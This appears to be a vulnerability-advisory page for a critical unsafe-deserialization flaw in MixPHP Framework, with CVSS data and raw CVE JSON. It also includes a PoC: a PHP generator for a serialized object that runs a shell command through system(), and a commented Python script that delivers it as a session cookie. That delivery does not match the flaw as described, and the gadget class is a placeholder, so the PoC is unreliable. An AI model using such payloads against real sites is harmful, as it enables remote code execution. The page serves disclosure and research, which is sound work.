Security Vulnerability Report
CVE-2026-42473 CVSS 9.8 CRITICAL

CVE-2026-42473

Published: 2026-05-01 16:16:32
Last Modified: 2026-05-05 19:39:59

Description

Unsafe deserialization vulnerability in MixPHP Framework 2.x through 2.2.17. The session and cache handlers call unserialize() on data read from the filesystem in the FileHandler object, so an attacker who can control the contents of a session or cache file can supply an arbitrary serialized object (CWE-502).

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MixPHP Framework 2.x
MixPHP Framework 2.2.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
PHP (payload generator), followed by a conceptual Python delivery script in comments

<?php
// PoC Generator for CVE-2026-42473
// This script generates a malicious serialized object to exploit unsafe deserialization.
// Usage: php generate_payload.php > payload.txt

class ExploitObject {
    public $cmd;

    function __construct($cmd) {
        $this->cmd = $cmd;
    }

    function __destruct() {
        // Vulnerable system call triggered during deserialization
        // Note: serialize() only records the property, not the method, so this
        // destructor also fires locally when the temporary object is freed below.
        system($this->cmd);
    }
}

// Generate payload to execute 'id' command
// In a real attack, replace 'ExploitObject' with a valid Gadget Chain available in MixPHP
$payload = serialize(new ExploitObject('id'));
echo $payload;
?>

# Python script to deliver the payload (Conceptual)
# import requests
# target_url = "http://target-mixphp-site.com"
# payload_file = open('payload.txt', 'r').read().strip()
#
# # Assuming the application stores session data in files and accepts custom session IDs
# cookies = {'PHPSESSIONID': payload_file}
#
# response = requests.get(target_url, cookies=cookies)
# print("Payload sent, check response for execution results.")

References

https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975
https://github.com/mix-php/mix
https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42473",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-01T16:16:31.703",
    "lastModified": "2026-05-05T19:39:58.510",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The session and cache handlers use unserialize() on data from the filesystem in the FileHandler object."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/mix-php/mix",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php",
        "source": "[email protected]"
      }
    ]
  }
}